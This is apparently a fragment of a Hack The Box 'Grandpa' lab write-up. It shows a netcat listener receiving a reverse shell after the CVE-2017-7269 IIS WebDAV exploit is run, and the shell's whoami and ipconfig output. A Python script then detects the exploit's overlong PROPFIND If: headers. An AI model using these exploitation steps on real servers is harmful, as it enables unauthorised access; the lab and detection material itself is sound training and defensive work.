Buffer Overflow
^a4ea2d
This is the exploit that I found online.
Executing the modified exploit
┌──(kali㉿kali)-[~/archive/htb/labs/grandpa]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.14] 1030
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv> whoami
nt authority\network service
c:\windows\system32\inetsrv> hostname
granpa
c:\windows\system32\inetsrv> ipconfig
Windows IP Configuration
ethernet adapter local area connection:
connection-specific dns suffix . :
ip address. . . . . . . . . . . . : 10.10.10.14
subnet mask . . . . . . . . . . . : 255.255.255.0
default gateway . . . . . . . . . : 10.10.10.2
Received the shell.
Initial foothold established as nt authority\network service by exploiting CVE-2017-7269.
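As an added defender-side example (not part of the original write-up), a small Python check for the request shape that public CVE-2017-7269 exploits use: a WebDAV PROPFIND whose If: header is abnormally long or carries non-ASCII characters. The sample requests, the 512-byte threshold and the function names are constructed assumptions for this example.

```python
"""Flag PROPFIND requests whose If: header looks like a CVE-2017-7269 attempt.

CVE-2017-7269 is a buffer overflow in IIS 6.0 WebDAV (ScStoragePathFromUrl);
public exploits deliver the overflow through an overlong If: header on a
PROPFIND request. Sample requests below are constructed for this example.
"""

# Assumption: a legitimate If: header holds a few lock tokens / ETags and
# stays well under this length; tune for your own WebDAV clients.
MAX_IF_HEADER_LEN = 512


def parse_request(raw: str) -> tuple[str, dict[str, str]]:
    """Split a raw HTTP request into (METHOD, {lower-cased header: value})."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method = lines[0].split(" ", 1)[0].upper()
    headers: dict[str, str] = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, headers


def check_propfind(raw: str) -> list[str]:
    """Return the reasons a request is suspicious; an empty list means benign."""
    method, headers = parse_request(raw)
    if method != "PROPFIND" or "if" not in headers:
        return []  # the vulnerable code path is only reached via PROPFIND + If:
    if_hdr = headers["if"]
    reasons: list[str] = []
    if len(if_hdr) > MAX_IF_HEADER_LEN:
        reasons.append(f"If header is {len(if_hdr)} chars long")
    if any(ord(c) > 0x7F for c in if_hdr):
        reasons.append("If header contains non-ASCII characters")
    return reasons


# Constructed samples: an ordinary lock-token If: header vs. an overlong,
# non-ASCII one shaped like the public proof-of-concept traffic.
BENIGN = ("PROPFIND /docs/ HTTP/1.1\r\nHost: 10.10.10.14\r\nDepth: 1\r\n"
          "If: <http://10.10.10.14/docs/> (<opaquelocktoken:abc-123>)\r\n\r\n")
SUSPICIOUS = ("PROPFIND / HTTP/1.1\r\nHost: 10.10.10.14\r\n"
              "If: <http://localhost/" + "\u00e9" * 600 + ">\r\n\r\n")

if __name__ == "__main__":
    for name, req in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(name, check_propfind(req) or "ok")
```

The standard IIS W3C log format does not record the If: header, so this check needs the raw request, for example from a reverse proxy, WAF or packet capture in front of the server.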